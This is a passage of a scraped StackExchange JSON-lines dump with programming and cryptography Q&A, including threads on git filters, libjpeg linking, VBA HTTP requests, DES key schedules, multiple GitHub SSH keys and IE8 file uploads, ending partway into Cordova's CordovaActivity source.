is a better idea.\nCheck this answer out: https:\/\/stackoverflow.com\/a\/17360528\/5958455\nBasically you set your script as a \"clean filter\" so it gets applied whenever a matching file is staged. This luckily includes your use case of <code>git commit <file...><\/code>.\nComment: I tried git config --global filter.updateHeader.clean editfile.py, then I got this error: cannot fork to run external filter 'editfile.py' and external filter 'editfile.py' failed. Where should I place the editfile.py?\nComment: @hexacool The path should be relative to the \"project root\", i.e. where the `.git` directory is. If you're unsure, use absolute path.\nComment: I placed the script file at the project root it doesn't work. 
Tried absolute path, it show fatal: cannot exec: \/home\/username\/projectname\/editfile.py' :Permission denied when run the script.\nComment: @hexacool Apparently you forgot `chmod 755` or similar.\n","meta":{"source":"stackoverflow","title":"Git commit with pre-commit hook, why it get different results?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Undefined reference to jpeg_CreateDecompress() error when using libjpeg\n\nQuestion: I install libjpeg-dev and all files are in the include folder \n<code>\/usr\/include\/jerror.h\n\/usr\/include\/jmorecfg.h\n\/usr\/include\/jpegint.h\n\/usr\/include\/jpeglib.h\n\/usr\/include\/turbojpeg.h\n\/usr\/include\/x86_64-linux-gnu\n\/usr\/include\/x86_64-linux-gnu\/jconfig.h\n<\/code>\nAnd when I try this simple code to decompress a jpeg image I got the error as in title.\nhere is the code:\n<code>#include <stdlib.h>\n#include <stdio.h>\n#include <jpeglib.h>\nint main(void){\n struct jpeg_decompress_struct cinfo;\n struct jpeg_error_mgr jerr;\n cinfo.err = jpeg_std_error(&jerr);\n jpeg_create_decompress(&cinfo);\n\n return 0;\n}\n<\/code>\nAnswer: The same problem has buged me for about two days!\nmy solution is use:\n<code>gcc your_code.c -ljpeg\n<\/code>\ninstead of:\n<code>gcc -ljpeg your_code.c\n<\/code>\nto compile your code.\nhere is the explanation:Why does the order in which libraries are linked sometimes cause errors in GCC?\nhope this will help.\nAnswer: That sounds like a linking error.\nYou are probably not linking to the library code; just including the header is not enough, that's not how C works.\nAdd something like <code>-ljpeg<\/code> last on your command line.\nComment: i used this version libjpeg-turbo8-dev\n","meta":{"source":"stackoverflow","title":"Undefined reference to jpeg_CreateDecompress() error when using libjpeg","dup_signals":{}},"subset":"stackexchange"} +{"text":"The script works well when I use MSXML2.XMLHTTP.6.0, but it fails miserably when I switch to\u00a0MSXML2.serverXMLHTTP.6.0\n\nQuestion: I've created a script in VBA to scrape breadcrumbs from a webpage using XML HTTP requests. The script works well when I implement the ActiveX component <code>MSXML2.XMLHTTP.6.0<\/code>, but it fails miserably when I switch to <code>MSXML2.serverXMLHTTP.6.0<\/code>.\nAs I've got a plan to use proxies within the script, it is necessary that I stick with <code>MSXML2.serverXMLHTTP.6.0<\/code>. However, the seond script doesn't work. To let you know, when I print the <code>.responseText<\/code>, I see gibberish content within it, as in the following:\n<code>??GN?!v:h??_??Og<]?????X ?6??'o??F??6 ?uh????x?r???????sP??????????[B??k????]??????yC????'???L???????,*?Z????? ?vX ?c?q\\t?j??????K?|???P 7??k?y?<;?>????a?*P1????w???[?T?\/f?? ?7?gn??V<E?Z??6t:??1??????E'v?1?? 
?w??+??????-aD????wy?<\/code>.\nUsing <code>MSXML2.XMLHTTP.6.0<\/code> (works flawlessly):\n<code>Option Explicit\nSub GrabInfo()\n Const Url$ = \"https:\/\/www.amazon.com\/gp\/product\/B00FQT4LX2?th=1\"\n Dim oHttp As Object, Html As HTMLDocument, breadCrumbs$\n\n Set Html = New HTMLDocument\n Set oHttp = CreateObject(\"MSXML2.XMLHTTP.6.0\")\n\n With oHttp\n .Open \"GET\", Url, True\n .setRequestHeader \"User-Agent\", \"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.150 Safari\/537.36\"\n .send\n While .readyState < 4: DoEvents: Wend\n MsgBox \"Status code: \" & .Status\n Html.body.innerHTML = .responseText\n breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\n MsgBox breadCrumbs\n End With\nEnd Sub\n<\/code>\nUsing <code>MSXML2.serverXMLHTTP.6.0<\/code> (throwing an error showing <code>Object Variable or With block variable not set<\/code>):\n<code>Option Explicit\nSub GrabInfo()\n Const Url$ = \"https:\/\/www.amazon.com\/gp\/product\/B00FQT4LX2?th=1\"\n Dim oHttp As Object, Html As HTMLDocument, breadCrumbs$\n\n Set Html = New HTMLDocument\n Set oHttp = CreateObject(\"MSXML2.serverXMLHTTP.6.0\")\n\n With oHttp\n .Open \"GET\", Url, True\n .setRequestHeader \"User-Agent\", \"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/88.0.4324.150 Safari\/537.36\"\n .send\n While .readyState < 4: DoEvents: Wend\n MsgBox \"Status code: \" & .Status\n Html.body.innerHTML = .responseText\n breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\n MsgBox breadCrumbs\n End With\nEnd Sub\n<\/code>\n\nHow can I make the second script built on <code>MSXML2.serverXMLHTTP.6.0<\/code> work?\nComment: [Proxy issue MSXML2.ServerXmlHttp](https:\/\/stackoverflow.com\/questions\/41026800\/excel-vba-msxml2-xmlhttp-6-0-vs-msxml2-serverxmlhttp-6-0?) ?\nComment: It is not a proxy issue. Instead, I gave a reason why I wish to stick with MSXML2.serverXMLHTTP.6.0.\nComment: [Differences between XMLHTTP and ServerXMLHTTP](https:\/\/stackoverflow.com\/questions\/11605613\/differences-between-xmlhttp-and-serverxmlhttp) The return value of `.responseText` is not a literal html strings. `querySelector` can't find the element. You can check the conten after saving it as a local text file.\nComment: I've already looked into the response text to find the desired element, but there is nothing but unintelligible stuff. However, If you replace the existing URL with [this](https:\/\/www.yellowpages.com\/search?search_terms=pizza&geo_location_terms=San+Francisco%2C+CA) and the selector with `.result h2 > a.business-name`, you can see that the script is able to find the element accordingly. So, it's not always the case that querySelector can find the element in the response text returned by ServerXMLHTTP @taller.\nComment: Agree. I guess it depends on how the remote server responds to requests from `ServerXMLHTTP`.\nAnswer: I tried your code and got the same \"glibberish\" response. 
However, removing the statement <code>setRequestHeader<\/code> (where you set the user agent) solved that issue and the response was readable, while using a different User agent (the one suggested here) resulted in the strange response.\nNote that the result of <code>Html.querySelector<\/code> is an object, not a string and you should use\n<code>Dim breadCrumbs as Object \nSet breadCrumbs = Html.querySelector(\"#wayfinding-breadcrumbs_feature_div\")\nMsgBox breadCrumbs.innerHTML\n<\/code>\n","meta":{"source":"stackoverflow","title":"The script works well when I use MSXML2.XMLHTTP.6.0, but it fails miserably when I switch to\u00a0MSXML2.serverXMLHTTP.6.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"Question on monoalphabetic substitution\n\nQuestion: \nQuestion:\n A stream of cipher operates on a data stream of 6-bit characters using a simple mono-alphabetic substitution technique. Estimate and explain the number of different substitution alphabets possible. The key is effectively the substitution alphabet, which can be expressed as a $384$-bit number (i.e. $64\u00d76$ bits).\nDiscuss the security of this system compared with DES\/3DES and a one-time pad, providing a full justification for your conclusions.\n\nThis is a past exam question which I am struggling to solve. I am not a security expert, nor intending to move in that direction as a career path. The module is part of my MSc course and has nothing to do with my career.\nAnswer (what I have so far):\nThe number of different substitution alphabets is $26!$ (factorial), assuming use of the English alphabet. It is also assumed that letters can be in any position and cannot repeat themselves.\n\nWhy is the key suddenly expressed as a $384$-bit number? I don't understand. Why $64\u00b76$? \nWe don't have $64$ characters in our alphabet...if each character within the English alphabet is represented with $6$ bit, then it should be $6\u00b726=156$ bits. Correct?\nNow I am thinking if the question says $64$, maybe the alphabet is custom (like including uppercase letters and some numbers + characters), so the number of permutations is $64!$ (factorial). Is this correct?\nWhat does this key look like (or an example of such a key)?\nI understand key substitution with a single key word. For example: \n<code>abcdefghijklmnopqrstuvwxyz<\/code>\n<code>hatredbcfgijklmnopqsuvwxyz<\/code>\nCan you help me determine what the substitution alphabet key should look like?\nI went to Wikipedia's page Six-bit character code and became even more confused. Is this link even relevant?\n\nI would appreciate examples more than answers. Thank you. If you find my question too long, please ignore the part about comparison with other encryption systems.\nComment: Yes, there are not 26 characters, but 64 \u2013 this is mentioned in the question. (This might be something like uppercase, lower case, digits and some punctuation, or simply 6-bit units without any meaning, like an encoded image file.) Your Wikipedia link shows some example on what your six-bit alphabet might represent. But this doesn't have to concern you as a cryptographer.\nAnswer: The format they are proposing for the key seems to be some sort of bit-packed array. First, with 6 bits, there are 64 possible values (0-63). Now, imagine you have replacement rules (your key) like these:\n\n0 -> 17\n1 -> 43\n2 -> 12\n...\n63 -> 8\n\nWhich means: when encrypting, replace all occurrences of the value <code>0<\/code> with <code>17<\/code>, all <code>1<\/code>s with <code>43<\/code>, etc. 
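\nAs a rough illustration of that replacement-rule idea, a minimal Python sketch (the table below is just a random stand-in for a real key, not the example values above) could look like this:\n<code>import random\n\n# hypothetical key: some permutation of the 64 possible 6-bit values\ntable = list(range(64))\nrandom.shuffle(table)\n\n# the inverse permutation, used for decryption\ninverse = [0] * 64\nfor i, t in enumerate(table):\n    inverse[t] = i\n\ndef encrypt(symbols):\n    # replace each 6-bit symbol by its table entry\n    return [table[s] for s in symbols]\n\ndef decrypt(symbols):\n    return [inverse[s] for s in symbols]\n\nassert decrypt(encrypt([0, 1, 63])) == [0, 1, 63]\n<\/code>\n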
These values may correspond to letters, but that is not necessary at this point. As the numbers on the left side of the mapping table are sequential, an alternative form of writing this key would be $17,43,12,...,8$. This could easily be transformed into the more verbose initial version. Each number in the list takes 6 bits to represent (since it must also be $<64$), and there are 64 of them, so total bits to store the key is $64*6=384$.\nIn a way, this key size is deceiving. Key of size $l$ bits normally implies that there are $2^l$ possibilities for the key. Here, you were right to use factorials. There are only $64!\\approx 2^{296}$ possible keys. To understand why this is true, think about what happens if the key is sent, but the last 6-bit number is left off. We can figure out which one it is just by seeing which value hasn't been used yet. Even if the last two 6-bit numbers are left off, there are only two possibilities for the key ($a,b$ or $b,a$). So clearly, sending 384 bits means that we are sending more than we strictly need.\nThe 6-bit character code is just one possible way to convert these 6-bit numbers the algorithm uses into characters that are useful for humans.\n","meta":{"source":"crypto.stackexchange","title":"Question on monoalphabetic substitution","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to send data to druid using docker-druid image\n\nQuestion: I am trying to use the docker-druid image to run a druid cluster. \nI started the cluster as per the instructions in the github wiki. \n<code>docker run --rm -i -p 3000:8082 -p 3001:8081 druidio\/example-cluster\n<\/code>\nI can access the druid cluster console at 192.168.99.100:8081 as well as coordinator console at 192.168.99.100:8090 successfully. \nHowever i am unable to send any data to druid instance on this cluster using <code>tranquility<\/code>.\nI am using the Tranquility Java Example to send data to druid. In this case tranquility is used as a library and not as a server. This example program works fine and is able to send data to druid if i setup druid locally on a VM as per the instructions in Getting started guide\nhowever if i try to use the dockerized druid, no data is sent to it. Neither do i see any errors. I am configuring the address of the default docker machine in my tranquility configuration as shown below:\n<code> \"properties\" : {\n \"zookeeper.connect\" : \"192.168.99.100\",\n \"druid.discovery.curator.path\" : \"\/druid\/discovery\",\n \"druid.selectors.indexing.serviceName\" : \"druid\/overlord\",\n \"http.port\" : \"8200\",\n }\n<\/code>\nIs there any additional configuration required when using docker-druid in order to send data to it from a Java application using tranquility? \nDoes tranquility locate druid services using zookeeper which would require zookeeper ports to be opened?\nWhat am i missing here?\nAnswer: I believe you are missing port 8200 in your docker config if you add <code>-p 8200:8200<\/code> you should be good to go. For more information check out https:\/\/github.com\/implydata\/distribution-docker\n","meta":{"source":"stackoverflow","title":"Unable to send data to druid using docker-druid image","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple commands to run using Visual Basic\n\nQuestion: I am developing a tool on Visual Studio 2010 which has a button which executes a powershell program. 
But before this execution we need to change the path on cmd prompt.\n<code>cd Try & powershell C:\\Users\\Medha\\Try\\out.ps1\n<\/code>\n, this statement works fine on cmd prompt but in my VB code, both the commands are taken together and executed at once, which needs to be one by one.\nI have tried this\n<code> > Shell(\"cmd.exe \/k\" + \"cd Try & powershell C:\\Users\\Medha\\Try\\out.ps1\")\n<\/code>\nPlease suggest changes to make it work.\nAnswer: Why don't you use <code>WorkingDirectory<\/code> property\n<code>Dim myProcess As New System.Diagnostics.Process\n\/\/if it's in system directory use Environment.SystemDirectory\nmyProcess.StartInfo.WorkingDirectory = \"your\\working\\directory\"\nmyProcess.StartInfo.FileName = \"powershell.exe\"\nmyProcess.StartInfo.UseShellExecute = True\nmyProcess.Start\n<\/code>\nComment: this would change the directory too ?\nComment: by default, cmd prompt opens up with C:, that itself I change it to Try directory first and then execute the powershell code as the powershell program generates some files initially which is used later in that code itself. for that it is necessary to change the path first so that the file created in middle gets created in the Try directory and can be used further\n","meta":{"source":"stackoverflow","title":"Multiple commands to run using Visual Basic","dup_signals":{}},"subset":"stackexchange"} +{"text":"NTRU less secure than previously thought?\n\nQuestion: A new paper (https:\/\/eprint.iacr.org\/2015\/552.pdf) says:\n\nThis makes it possible to asymptotically and heuristically break the NTRU cryptosystem in subexponential time (without contradicting its security assumption).\n\nDoes this mean NTRU is less secure now? By how much?\nComment: The attack in this paper is not as efficient as existing lattice-based attacks on practical parameters, so it does not affect the concrete parameters for NTRU (see the bottom of page 2). However, it is an asymptotic improvement over previous attacks, so it may lead to concretely lower security in the future. Note also that the attack requires nearly an exponential amount of space, which can make it hard to run in reality.\nAnswer: No, this result (as it stands) is of no practical use against NTRU as typically used. To quote the paper:\n\nNote that there is a large value hidden in the o(1) term, so that our algorithm does not yield practical attacks for recommended NTRU parameters.\n\nIn addition, while it is subexponential, it's just barely so; they estimate the time as $2^{ (\\ln 2\/2+o(1))n\/ \\log \\log n}$; even if we ignore the $o(1)$ term, this grows just slightly slower than an exponential function.\nOn the other hand, it may be that this attack might be useful against the use of NTRU as a somewhat homeomorphic cipher (which requires the error terms to be much smaller). In addition, perhaps this result can be sharpened to be strong enough to be useful against NTRU. So, while this isn't fatal to NTRU, the book isn't closed either.\n","meta":{"source":"crypto.stackexchange","title":"NTRU less secure than previously thought?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to Resizable column in pivot table in ZK\n\nQuestion: I have pivot table with large content . Right now I am facing problem of column size.\nIf there are large content in database at that time some contents are not displayed . \nIs there any property to make ZK pivottable column resizable . 
\nPlease check below image for more clear idea.\nAnswer: You can utilize the following Javascript to resize it.\nFor example,\n<code>zk.Widget.$(jq('@pivottable')).$n('dataTitle').style.width = '600px';\n<\/code>\nComment: No . I want to do scrollable . if my content is large than 600 px ? then what to do ?\nAnswer: See ZK pivoty tabel live demo\nhttp:\/\/www.zkoss.org\/zkdemo\/application\/pivottable\nmay be you found your solution\n","meta":{"source":"stackoverflow","title":"How to Resizable column in pivot table in ZK","dup_signals":{}},"subset":"stackexchange"} +{"text":"TInyPNG integration with Google App Engine Datastore\n\nQuestion: I need to fetch images from different URLs and store it in Google Datastore after compressing it. I understand tinyPNG is the a great API to do the compression but the API only supports Amazon S3. \nCan someone guide how to accomplish this in Google App Engine.\nAnswer: The S3-only support you mentioned applies only to directly uploading the compressed images from their server (i.e. without passing them through the application making the image compression requests), which is just a convenience feature. From the tinypng docs:\n\nUploading to Amazon S3\nYou can tell the Tinify API to upload compressed images directly to\n Amazon S3. If you use S3 to host your images this saves you the hassle\n of downloading images to your server and uploading them to S3\n yourself.\n\nYour app should be able to download the compressed images using their REST API and save them to the datastore.\nAnswer: Since the Google App Engine is read only, you can't write files to it with the built-in tinify functions. You can, though, use blob storage in the App Engine. Make sure you have the tinify code and requests module (which tinify uses) in a libs folder in your GAE app. I needed version 2.3 of requests in order for tinify to work.\nTo use image storage with GAE, define a database model for an entity with blob storage, something like:\n<code>from google.appengine.ext import ndb\n\nclass Image(ndb.Model):\n img = ndb.BlobProperty()\n<\/code>\nNow we need a function in tinify that writes to blob storage of an entity instead of writing to a file. You can mirror the existing tinify code for writing to file:\nIn the <code>source.py<\/code> file, add this method:\n<code>from google.appengine.ext import ndb\n\nclass Source(object):\n ...\n def to_blob(self, key):\n return self.result().to_blob(key)\n ...\n<\/code>\nAnd in the <code>result.py<\/code> file add this method:\n<code>from google.appengine.ext import ndb\n\nclass Result(ResultMeta):\n ...\n def to_blob(self, key):\n img_store = key.get()\n img_store.img = self.data\n ...\n<\/code>\nNow tinify can write in GAE that you can serve however you want. You just need to create an entity, pass the key to the Source.to_blob() method and your entity will now have the compressed image stored. 
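\nAs an aside on the first answer's suggestion (downloading the compressed bytes yourself and saving them to the datastore), a rough sketch might look like the following, assuming the official tinify Python client exposes <code>from_url<\/code> and <code>to_buffer<\/code> as its documentation describes, and reusing the <code>Image<\/code> model defined above; the API key is a placeholder:\n<code>import tinify\n\ntinify.key = 'YOUR_API_KEY' # placeholder\n\ndef compress_and_store(url):\n    # ask the TinyPNG service to fetch and compress the image,\n    # then pull the compressed bytes back into the app\n    data = tinify.from_url(url).to_buffer()\n    # store the bytes in the BlobProperty and return the datastore key\n    return Image(img=data).put()\n<\/code>\n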
So now you can do:\n<code>class Basepage(webapp2.RequestHandler):\n def post(self):\n ...\n img_store = Image()\n img_key = img_store.put()\n\n # Use URL for image to be compressed\n source = tinify.from_url(\"http:\/\/...\")\n source.to_blob(img_key)\n\n compressed_img_store = img_key.get()\n\n self.response.headers['Content-Type'] = 'image\/png'\n self.response.out.write(compressed_img_store.img)\n<\/code>\n","meta":{"source":"stackoverflow","title":"TInyPNG integration with Google App Engine Datastore","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rotation table for 8 round DES\n\nQuestion: I'm trying to implement DES from scratch using the NIST paper and the Wikipedia article on DES.\nI got 16 round DES done, but I can't seem to get 8 round DES working. I figure it's because I got the rotation table wrong. The rotation table I'm using for the 16 round version is straight off of Wikipedia's DES Supplementary Materials, while the 8 round version is the same with a few 2's in the middle taken out to make the length 8. { 1, 1, 2, 2, 1, 2, 2, 1 } for encryption and { 0, 1, 2, 2, 1, 2, 2, 1 } for decryption, which uses inverted key scheduler for decryption. Apparently, that's wrong, and I can't find a table or a algorithm for creating a rotation table.\nIf anyone can point me to either, it'd be much appreciated.\nAnswer: The catch is that for decryption to work reliably for all keys, the subkeys must be the same for encryption and decryption with order reversed. With many DES implementations, that implies the sum of the rotations in the key schedule should be a multiple of $28$, the width of the C and D registers.\nUse say $15,2,2,2,2,2,2,1$ rather than your $1,1,2,2,1,2,2,1$ and you should be flying (assuming the code handles these larger values, and does not use the optimization enabled by the fact that after removing the first value in the DES key schedule table $1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1$, the $15$ remaining entries are a palindrome). Note: I have changed my suggested values so that the subkeys used match the ones in the last $8$ rounds of encryption in standard DES; that reuses some of the work made by DES designers when crafting PC-2 w.r.t. the key schedule.\nAlternatively, use $1,1,2,2,2,2,2,2$ for encryption and make an extra rotation by $14$ before decryption. That way we use the same subkeys as for the first $8$ rounds of encryption in standard DES.\n\nUpdate: the modified question tells us that the implementation uses different tables for encryption and decryption. In that case, $1,1,2,2,2,2,2,2$ for encryption and $14,2,2,2,2,2,2,1$ for decryption should work (with rotation counts in opposite directions and before the use of the generated subkey). The first decryption value must equal the sum of encryption values$\\pmod{28}$. The following decryption values are obtained by dropping the first encryption value and reversing the list.\nCaution: care should be taken that all keys bits are used about evenly and regularly, by considering the interaction of rotation counts with PC-2. 
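\nThat derivation rule is easy to sanity-check in code; a minimal Python sketch, assuming only the rule as stated above and the 28-bit width of the C and D registers, would be:\n<code>def decryption_schedule(enc_rotations, register_width=28):\n    # first decryption rotation = sum of the encryption rotations mod 28;\n    # the rest = the encryption list with its first entry dropped, then reversed\n    first = sum(enc_rotations) % register_width\n    return [first] + list(reversed(enc_rotations[1:]))\n\n# the 8-round schedule suggested in the alternative above\nassert decryption_schedule([1, 1, 2, 2, 2, 2, 2, 2]) == [14, 2, 2, 2, 2, 2, 2, 1]\n\n# the standard 16-round schedule yields the usual DES decryption rotations\nassert decryption_schedule([1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]) == [0, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]\n<\/code>\n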
Because I'm lazy I kept the original first $8$ $rotations, which is at least not disastrous in this respect.\nComment: Works with 1,1,2,2,2,2,2,2 for encryption and 14,2,2,2,2,2,2,1 for decryption, and also thanks for the explanation on how to get the appropriate decryption rotation table.\n","meta":{"source":"crypto.stackexchange","title":"Rotation table for 8 round DES","dup_signals":{}},"subset":"stackexchange"} +{"text":"Autoload models, forms inside modules in zend framework\n\nQuestion: My application structure is like this:\n\napplication\n\nmodules\n\ndefault\nstudent\n\ncontrollers\nforms\n\nstudentParent.php\n\nmodels\nviews\nBoostrap.php\n\nI have a studentParent.php inside forms folder of student module. \n<code>class Student_Form_studentParent extends Zend_Dojo_Form{\n}\n<\/code>\nWhenever I call this form class inside controller of student module, I get class not found error\nI have placed Bootstrap.php inside student module. \n<code>class Student_Bootstrap extends Zend_Application_Module_Bootstrap\n{\n\n}\n<\/code>\nHere's my application.ini file configuration\n<code>resources.frontController.params.displayExceptions = 0\nresource.modules=\"\"\nresources.view = \"\"\nresources.layout.layoutPath = APPLICATION_PATH \"\/layouts\/scripts\"\nresources.layout.layout = \"main_template\"\n<\/code>\nMy Bootstrap.php file:\n<code>class Bootstrap extends Zend_Application_Bootstrap_Bootstrap\n{\n protected function _initDefaultModuleAutoloader()\n {\n $moduleLoader = new Zend_Application_Module_Autoloader(\n array(\n \"namespace\" => '',\n \"basePath\" => APPLICATION_PATH.'\/modules\/default'\n )\n );\n\n Zend_Controller_Action_HelperBroker::addPrefix('App_Action_Helper');\n\n return $moduleLoader;\n }\n}\n<\/code>\nAnswer: <code>resource.modules=\"\"\n<\/code>\nshould be:\n<code>resources.modules=\"\"\n<\/code>\n(i.e. resources plural).\nI would also recommend that you use an upper case letter to start your class names, so <code>Student_Form_StudentParent<\/code> instead of <code>Student_Form_studentParent<\/code> (the filename will need to be <code>StudentParent.php<\/code> as well). Personal preference I suppose, but if the framework does it one way and your app does it another then your class naming will not be consistent.\nAnswer: Also the \n<code>$moduleLoader = new Zend_Application_Module_Autoloader(\narray(\n \"namespace\" => '',\n \"basePath\" => APPLICATION_PATH.'\/modules\/default'\n )\n );\n<\/code>\nThe basePath should point to the dir which contains modules, not, as in Your example, to the particular module dir.\nComment: Actually the module autoloader should point at the module dir, what he has is correct\n","meta":{"source":"stackoverflow","title":"Autoload models, forms inside modules in zend framework","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple SSH Keys on the same device\n\nQuestion: I registered a personal SSH key months ago and everything worked fine. Now I'm working for a company. They created their own GitHub account and I have started a new repository.\nI know I have to add another SSH key, which I did. 
\nThis is the content of the ~\/.ssh\/config file.\n<code>Host github.com\n HostName github.com\n User git\n PreferredAuthentications publickey\n IdentityFile ~\/.ssh\/id_rsa\n\nHost github-companyname\n HostName github.com\n User git\n PreferredAuthentications publickey\n IdentityFile ~\/.ssh\/id_rsa_companyname\n<\/code>\nI also did <code>ssh <keyname><\/code> and I am authenticated.\nAfter that I executed the following commands.\n<code>git init\ngit add \ngit remote add origin <repo>\n<\/code>\nIt works all fine, until I run <code>git push -u origin master<\/code>.\nI get this error.\n\nERROR: Repository not found.\n fatal: Could not read from remote repository.\nPlease make sure you have the correct access rights and the repository exists.\n\nI don't understand. Everything seems to be set up correctly.\nWhy am I getting that error message?\nIf that makes any difference, I am using OSX Sierra 10.12.4.\nComment: @Jakuje added my comment as an answer.\nComment: It seems that you have an issue with multiple ssh keys for the same host with git. I have faced a similar issue. Maybe this is of help https:\/\/gist.github.com\/jexchan\/2351996 especially the comments. Make sure in your .git\/config you modify your remote origin url and change the hostname from `github.com` to `github-companyname` as defined in your ssh config.\nComment: did you add your ssh key which you use for your company github acc in the github account ssh keys section?\nComment: @IndrekOts Your link was really helpful and it solved my problem. I thank you a lot ! I will edit my answer to help other people :)\nComment: Do not add answers to the question. There is field for answer bellow! Or @IndrekOts, can you fill the answer with what you wrote in the comment, since it resolved the OPs problem?\nAnswer: Since my comment resolved OPs issue, I'm writing this as an answer.\nThe problem seems to be in the fact that you have multiple ssh keys for the same host. In your <code>.ssh\/config<\/code> you have configured 2 hosts - <code>github.com<\/code> and <code>github-companyname<\/code>. In your company repository, you need to change the remote url in <code>.git\/config<\/code> from <code>email@example.com:...<\/code> to <code>git@github-companyname:...<\/code>. 
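\nOne way to make that change (using the same placeholder repository path as the clone example further down) is:\n<code>git remote set-url origin git@github-companyname:companyname\/repositoryname.git\ngit remote -v\n<\/code>\n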
Then ssh will use the correct key and you should have no problems with authentication.\nFor further reading:\n\nhttps:\/\/gist.github.com\/jexchan\/2351996 especially the comments\nhttp:\/\/nerderati.com\/2011\/03\/17\/simplify-your-life-with-an-ssh-config-file\/\n\nWhen you need to clone an existing repository with your company key, you can apply the same approach.\n<code>git clone git@github-companyname:companyname\/repositoryname.git\n<\/code>\nNotice that instead of <code>github.com<\/code>, the command uses <code>github-companyname<\/code>.\n","meta":{"source":"stackoverflow","title":"Multiple SSH Keys on the same device","dup_signals":{}},"subset":"stackexchange"} +{"text":"getting access is denied error on IE8\n\nQuestion: I have a HTML form (upload.htm) with a HTML file upload control inside of it.\n<code><form id=\"frmupload\" name=\"upload\" enctype=\"multipart\/form-data\" action=\"uploadhandler.ashx\" method=\"post\">\n <input id=\"uploader\" name=\"uploadctrl\" type=\"file\"\/>\n<\/form>\n<\/code>\nThere is also one JavaScript method in the above page which goes like:\n<code>function performUpload(){\n document.getElementById('frmupload').submit();\n}\n<\/code>\nI call this inside of a page (uploadpage.htm) from within an <code>iframe<\/code>:\n<code><iframe id=\"docframe\" src=\"upload.htm\" style=\"display:none\"><\/iframe>\n<\/code>\nI try to execute the statement shown below from the uploadpage.htm page:\n<code>var i = document.getElementById('docframe');\ni.contentWindow.performUpload();\n<\/code>\nI get an error saying Access is denied, and my debugger halts at the first JavaScript function I've shown. Both the files are in the same location in the web project. They have the same domain name too. Why do I get this error then?\nOf course, earlier, I could post the page: when I did not set the <code>name<\/code> attribute for the HTML upload control. But after I set the name attribute in HTML markup, I get this weird error. Why didn't I get this the first time?\nHad a look @ this post --> \"Access is denied\" when script tries to access iframe in IE8, but it didn't help.\nAnswer: IE doesn't allow manipulation of the type=\"file\" input element from javascript due to security reasons. Setting the filename or invoking a click event to show the browser dialog will result in an \"Access is denied\" error on the form submit - Internet Explorer is clever about remembering what methods have been invoked.\nSimilar issue: http:\/\/www.webdeveloper.com\/forum\/showthread.php?t=181272\nComment: Aha, I got it \u2014 my file input didn't have a name attribute on it. As soon as I add one, I do get the access denied error: http:\/\/jsfiddle.net\/NkycS\/32\/\nComment: Have to reaffirm this answer. I was frantically looking for an issue with my form upload where in fact I was using the custom file input in IE and this was causing the Access is Denied issue. Great insight, thx\nComment: What am I missing? This fiddle seems to prove this answer wrong; using Ender\/Bean instead of jQuery I've got IE9 opening the file picker and submitting the form to a generated iframe all via JS and it appears to work: http:\/\/jsfiddle.net\/NkycS\/27\/\nComment: Best answer for this here: http:\/\/stackoverflow.com\/questions\/572768\/styling-an-input-type-file-button?noredirect=1&lq=1\n\nAnswer by Josh Crozier\nAnswer: Traditionally, JavaScript access to HTML <code>input type=\"file\"<\/code> is severely limited for security concerns. 
AFAIK, You can't do the following with JS on a file uploader element:\n\nYou cannot read the \"value\" of the element as it holds the filename.\nYou can't fire up the file selection menu via JS.\nYou can't fire submit of the file uploader control via JS.\n\nAll this is in place to prevent malicious attacks like stealing your files in background via JS. I haven't played with an <code>input type=\"file\"<\/code> element in a while but my best guess is you will hit similar issues (if not all) in other browsers as well.\nYour best bet is a Flash based solution or maybe some new HTML5 control.\nAlso, here is an official reference on the subject matter:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/ms535263(v=vs.85).aspx\nCheck \"Community Content\" all the way on the bottom of the above page.\nAnswer: In both the HTML files \u2014 the one which is in the frame and another which contains the frame \u2014 try adding <code>document.domain='example.com'<\/code> where 'example.com' is your domain name.\n","meta":{"source":"stackoverflow","title":"getting access is denied error on IE8","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cordova - Android - File not found error\n\nQuestion: When I run the command - cordova emulate android, I get the following error:\n\n<code>Application Error - net::ERR_FILE_NOT_FOUND (file:\/\/\/android_asset\/www\/index.html)<\/code>\n\nCordovaActivity:\n\n<code>\/*\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n*\/\npackage org.apache.cordova;\n\nimport java.util.ArrayList;\nimport java.util.Locale;\n\nimport org.json.JSONException;\nimport org.json.JSONObject;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.annotation.SuppressLint;\nimport android.content.DialogInterface;\nimport android.content.Intent;\nimport android.content.res.Configuration;\nimport android.graphics.Color;\nimport android.media.AudioManager;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.util.Log;\nimport android.view.Menu;\nimport android.view.MenuItem;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.Window;\nimport android.view.WindowManager;\nimport android.webkit.WebViewClient;\nimport android.widget.FrameLayout;\n\n\/**\n * This class is the main Android activity that represents the Cordova\n * application. 
